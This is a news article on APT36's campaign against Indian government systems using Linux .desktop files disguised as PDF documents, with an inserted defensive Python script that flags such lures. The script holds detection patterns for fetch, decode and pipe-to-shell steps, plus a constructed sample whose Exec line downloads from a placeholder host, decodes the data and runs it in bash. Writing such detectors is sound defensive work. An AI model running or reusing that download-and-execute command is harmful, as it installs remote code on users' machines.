Fake PDF files hide dangerous malware
A hacker group called Transparent Tribe, also known as APT36, is running a new cyber attack against India. The group is believed to be linked to Pakistan.
This time, they are using a special type of file called a “.desktop” file. Normally, these files are harmless application-launcher shortcuts on Linux desktops. In this attack, the file pretends to be a safe PDF document.
The hackers sent a fake file named “Meeting_Notice_Ltr_ID1543ops.pdf_.zip”. When someone opens it, the file displays a normal-looking PDF in the web browser so the victim thinks everything is fine. At the same time, it silently installs malware in the background.
The fake file is carefully made to trick people. It carries a PDF icon, is executed as an application, and even registers itself to start automatically whenever the computer is turned on. Once active, it downloads more hidden code from the internet, decodes it, and runs it without showing anything to the user.
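The lure described above combines a document-like name and icon, an Exec line that hands control to a shell, a download-decode-run chain, and autostart persistence. As an added example that is not part of the original article, the following Python triage script parses a .desktop file and reports which of those traits it shows; the sample entries and the placeholder hostname are constructed, not taken from the real campaign.

```python
import re
from pathlib import PurePosixPath

SHELLS = re.compile(r"\b(bash|sh|zsh|dash|python3?|perl)\b")
EXEC_CHECKS = [  # (pattern, finding) pairs applied to the Exec= line
    (re.compile(r"\b(curl|wget)\b"), "Exec fetches remote content"),
    (re.compile(r"base64\s+(-d|--decode)|xxd\s+-r"), "Exec decodes a payload"),
    (re.compile(r"\|\s*(ba)?sh\b"), "Exec pipes data into a shell"),
]

def parse_desktop(text: str) -> dict:
    """Parse the [Desktop Entry] group into a dict; keys stay case-sensitive."""
    entry, in_group = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("["):
            in_group = line == "[Desktop Entry]"
        elif in_group and "=" in line:
            key, _, value = line.partition("=")
            entry[key.strip()] = value.strip()
    return entry

def assess_desktop(text: str, path: str) -> list:
    """Return findings explaining why this file looks like a PDF-disguised dropper."""
    entry, p, findings = parse_desktop(text), PurePosixPath(path), []
    exec_line = entry.get("Exec", "")
    # Double extension such as notice.pdf.desktop mimics a document name.
    if ".pdf" in p.name.lower() and p.suffix == ".desktop":
        findings.append("filename mimics a PDF document")
    # Document-looking Name/Icon, but Exec hands control to a shell or script interpreter.
    if "pdf" in (entry.get("Icon", "") + entry.get("Name", "")).lower() and SHELLS.search(exec_line):
        findings.append("PDF-looking entry launches an interpreter")
    findings += [msg for rx, msg in EXEC_CHECKS if rx.search(exec_line)]
    # Under an autostart directory the entry runs at every login, i.e. persistence.
    if "autostart" in p.parts:
        findings.append("installed for autostart persistence")
    return findings

# Constructed samples, not the real campaign files; the hostname is a placeholder.
BENIGN = "[Desktop Entry]\nType=Application\nName=Text Editor\nExec=gedit %U\nIcon=gedit\n"
LURE = """[Desktop Entry]
Type=Application
Name=Meeting_Notice.pdf
Icon=application-pdf
Exec=bash -c "xdg-open https://placeholder.invalid/notice.pdf; curl -s https://placeholder.invalid/p | base64 -d | bash"
"""
```

Running `assess_desktop` over every entry under `~/.config/autostart` and `~/Desktop` gives a quick first pass; a benign launcher returns an empty list, while an entry matching the lure pattern returns several findings.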
Malware built for spying and stealing information
The malware is much more advanced than a normal virus. Researchers found it is a purpose-built program for Linux computers: a 64-bit executable, so it runs on current 64-bit systems.
Once it runs, the malware connects to a command-and-control server at “modgovindia[.]space:4000.” This server is the control room for the hackers: it lets them send commands and receive stolen data.
The malware uses several tricks to stay hidden. It talks to the server using methods that are harder to detect than normal internet traffic. It also sets up automatic tasks on the computer, so it relaunches itself every time the system is rebooted.
With this setup, the hackers can stay inside the computer for a long time without being noticed. They can steal files, monitor the system, and keep spying on the victim. The main targets of this attack are Indian government and defense systems.
Transparent Tribe’s record of cyber attacks
APT36 is not new to such attacks. The group has been active since at least 2013. Over the years, it has attacked people and organizations in at least 27 countries, including India, Afghanistan, Germany, Iran, and Pakistan.
The group became more visible in 2016 when researchers found it targeting Indian diplomats and military staff. Back then, it used fake emails and infected websites to trick people into downloading spying tools. Two of its custom tools, called Crimson and Peppy, were able to steal data, take screenshots, and even record from webcams.
Since then, APT36 has expanded its attacks beyond government and defense. It has also targeted universities, research groups, civil society groups, and diplomatic offices abroad.
Experts say the group often changes its methods. In the past, it focused more on Windows systems and mobile devices. Now, by using Linux “.desktop” files, it is clearly trying to attack the Linux systems used in Indian government offices more effectively.
The discovery, made on August 1, 2025, shows that this campaign is still active. The hackers are sending out fake files that look like normal documents but are actually dangerous traps. This makes the attack hard to spot and very effective for spying.